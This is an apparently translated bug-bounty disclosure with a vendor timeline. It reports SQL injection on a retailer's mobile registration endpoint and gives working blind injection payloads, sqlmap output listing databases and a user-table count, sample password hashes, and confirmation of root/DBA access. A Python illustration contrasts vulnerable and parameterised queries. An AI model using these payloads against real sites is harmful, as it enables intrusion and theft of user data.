2014-04-27: Details reported to the vendor, awaiting vendor handling
2014-04-28: Vendor confirmed; details disclosed to the vendor only
2014-05-08: Details disclosed to core white hats and relevant domain experts
2014-05-18: Details disclosed to regular white hats
2014-05-28: Details disclosed to intern white hats
2014-06-11: Details disclosed to the public
Saw that the first vendor in the vendor campaign was Sanfu, so I came to have a look around. Testing only. The ones reported so far look like they are all on the main site; hopefully this isn't a duplicate.
http://m.sanfu.com/reg/newCardPast.htm POST parameters: user.curcusid=C7514492&user.verify=444554
order and union both fail... trying blind injection
user.curcusid=C7514492' AND 2=2&user.verify=444554 (boolean-based injection; forgot to try a single quote first)
Tried sleep twice; from the response times concluded there is time-based injection (multiple query conditions)
user.curcusid=C7514492' AND SLEEP(3) AnD 2='2&user.verify=444554
The slow response time tells me: not good...
Place: POST
Parameter: user.curcusid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: user.curcusid=C7514492' AND 5870=5870 AND 'oDlZ'='oDlZ&user.verify=444554

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: user.curcusid=C7514492' AND SLEEP(5) AND 'jqcV'='jqcV&user.verify=444554
Loads of databases
web application technology: Nginx, JSP
back-end DBMS: MySQL 5.0.11
available databases [5]:
[*] c_sanfu
[*] information_schema
[*] mysql
[*] test
[*] wp
count eb_users
Database: c_sanfu
+----------+---------+
| Table    | Entries |
+----------+---------+
| eb_users | 3642963 |
+----------+---------+
Peeked at a few users
+-----------+----------------------------------+
| user_rank | user_password                    |
+-----------+----------------------------------+
| 1         | e10adc3949ba59abbe56e057f20f883e |
| 1         | ae5df06521199dd833689b41ef43af9a |
| 1         | d437df002f7a5c8555c107af8a643977 |
| 1         | 0c039a038da81afefa8da3d3d1fd3c63 |
| 1         | 8ce1fa948dcedd72e2c83a37af7408e0 |
+-----------+----------------------------------+
root privileges
web application technology: Nginx, JSP
back-end DBMS: MySQL >= 5.0.0
[INFO] testing if current user is DBA
[INFO] fetching current user
[INFO] resumed: root@%
current user is DBA: True
The above was testing only; not a single byte of data was taken. Please be aware.
Any gift? Please fix quickly and do a thorough check for any signs of a webshell.
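As an added illustration (not part of the original report or the vendor's code), the boolean oracle this report relies on, reproduced in Python against an in-memory SQLite table: a lookup that splices the POST parameters into the SQL text beside the same lookup with bound parameters. The table and column names are assumptions, and SQLite stands in for MySQL only because the quote-balanced boolean payload behaves the same way in both.

```python
import sqlite3

# Constructed stand-in for the card table behind the reg endpoint;
# table and column names are assumptions, not the vendor's real schema.
def make_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cards (curcusid TEXT, verify TEXT)")
    conn.execute("INSERT INTO cards VALUES ('C7514492', '444554')")
    conn.commit()
    return conn

def lookup_vulnerable(conn, curcusid, verify):
    # String concatenation: the request parameter becomes part of the
    # SQL text, so a quote in the value rewrites the WHERE clause.
    sql = ("SELECT COUNT(*) FROM cards WHERE curcusid = '%s' AND verify = '%s'"
           % (curcusid, verify))
    return conn.execute(sql).fetchone()[0]

def lookup_safe(conn, curcusid, verify):
    # Bound parameters: the value is sent as data and can never change
    # the structure of the statement, whatever characters it contains.
    sql = "SELECT COUNT(*) FROM cards WHERE curcusid = ? AND verify = ?"
    return conn.execute(sql, (curcusid, verify)).fetchone()[0]

# Quote-balanced true/false pair in the shape sqlmap reported above
# (the "AND N=N AND 'x'='x" form), with constructed tag values.
TRUE_PAYLOAD = "C7514492' AND 2=2 AND 'a'='a"
FALSE_PAYLOAD = "C7514492' AND 2=3 AND 'a'='a"

def oracle_differs(lookup):
    # A boolean-blind oracle exists when the true and false variants of
    # the same value produce different results. For the hardened lookup
    # both are just non-matching literals and return the same count.
    conn = make_demo_db()
    t = lookup(conn, TRUE_PAYLOAD, "444554")
    f = lookup(conn, FALSE_PAYLOAD, "444554")
    return t != f

if __name__ == "__main__":
    print("concatenated query leaks an oracle:", oracle_differs(lookup_vulnerable))
    print("parameterised query leaks an oracle:", oracle_differs(lookup_safe))
```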
Severity: High
Vulnerability rank: 18
Confirmed: 2014-04-28 08:44
Thanks for the submission; fixing.
None yet